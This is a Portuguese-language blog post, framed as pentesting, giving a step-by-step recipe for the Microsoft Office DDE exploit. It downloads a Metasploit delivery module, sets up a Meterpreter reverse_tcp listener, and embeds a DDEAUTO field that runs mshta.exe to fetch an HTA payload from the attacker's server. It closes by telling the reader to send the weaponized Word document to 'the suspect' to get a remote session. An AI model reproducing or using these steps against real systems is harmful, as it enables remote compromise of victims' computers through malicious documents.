Pentesting Windows usando o Microsoft Office DDE Exploit - Anonymous Hacker

[Latest News][10]

Análise de Vulnerabilidade
ANDROID
ANONYMOUS
ANTI-DDOS
ANTI-SPYWARES E ADWARES
APK PRO
APOSTILAS
CIÊNCIA
CURSO PHP
CURSO TCP / IP
CURSOS
CYBORG
CYBORG FALÇÃO
DDOS
DEEPWEB
DICAS
DOCUMENTARIO
DoS
EXPLOIT
FACEBOOK
Ferramentas de rede
FORENSE DIGITAL
INVASÕES
IPHONE
JOGOS
KALI LINUX
Lixão
MAC OS
Malware
MySQL
NOTÍCIAS
PAGINA FAKE
PHP SCRIPT
Programa De Invasao
PROGRAMAÇÃO
PROGRAMAS
PROXY
SCRIPTS
SEGURANÇA
SHELL
SISTEMA OPERACIONAL
TÉCNICA DE INVASÃO
Termux
VIDEOS
VPN
WHATSAPP
WINDOWS
Wireless Attacks
z=

Pentesting Windows usando o Microsoft Office DDE Exploit



Pentesting Windows usando o Microsoft Office DDE Exploit

O DDE exploit também era conhecido como troca dinâmica de dados, permite que os dados sejam transferidos entre aplicativos sem qualquer interação do usuário. Os hackers utilizaram esse método para executar scripts mal-intencionados para comprometê-lo.
Foi relatado à Microsoft pelo Sensepost, Etienne Stalmans e Saif El-Sherei, mas não foi corrigido porque muitos aplicativos estão usando o protocolo DDE. Esta exploração não requer uma função de macro para ser ativada.

Pré-requisitos - DDE exploit

  • 📌Máquina Windows
  • 📌Microsoft Office (qualquer versão)
  • 📌KALI LINUX
Teremos que importar uma exploração do Metasploit.
Faça o download do GitHub usando o terminal de comando

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb

Mova o script para o local do Metasploit

mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/
 

Agora digite msfconsole no terminal, que inicia o framework Metasploit e digite reload_all para carregar os módulos.


Esse exploit usa a função dde para entregar a carga hta. Agora digite

use exploit/windows/dde_delivery 
then set the sever host using the following command

set SRVHOST 192.168.177.141
precisamos definir um ouvinte de carga. Não use a porta 8080, pois a porta do servidor está definida por padrão para 8080

  1. set PAYLOAD windows/meterpreter/reverse_tcp
  2. set LHOST 192.168.177.141
  3. set LPORT 6708
  4. exploit


Agora copie e cole o código em qualquer documento do word. usamos o office 365 pro plus, totalmente atualizado. Localize a fórmula e você deve ter uma pequena caixa de erro no documento e, em seguida, clique com o botão direito do mouse no código de alternância. cole o comando no documento entre parênteses de flor. salve o documento.

{DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe “http://192.168.177.141:8080/mVg3YDU3gVQ”}
 
Envie o documento para o suspeito e uma sessão de medidor será aberta. Dê uma olhada no vídeo




Pentesting Windows usando o Microsoft Office DDE Exploit


Sobre

trabalho com segurança da informação a 13 anos, grande parte desse tempo como professor. Fiz meu bacharelado em ciência da computação, especialização em segurança da informação e logo após, mestrado em ciência da informação.

Nenhum comentário:

Postar um comentário

Start typing and press Enter to search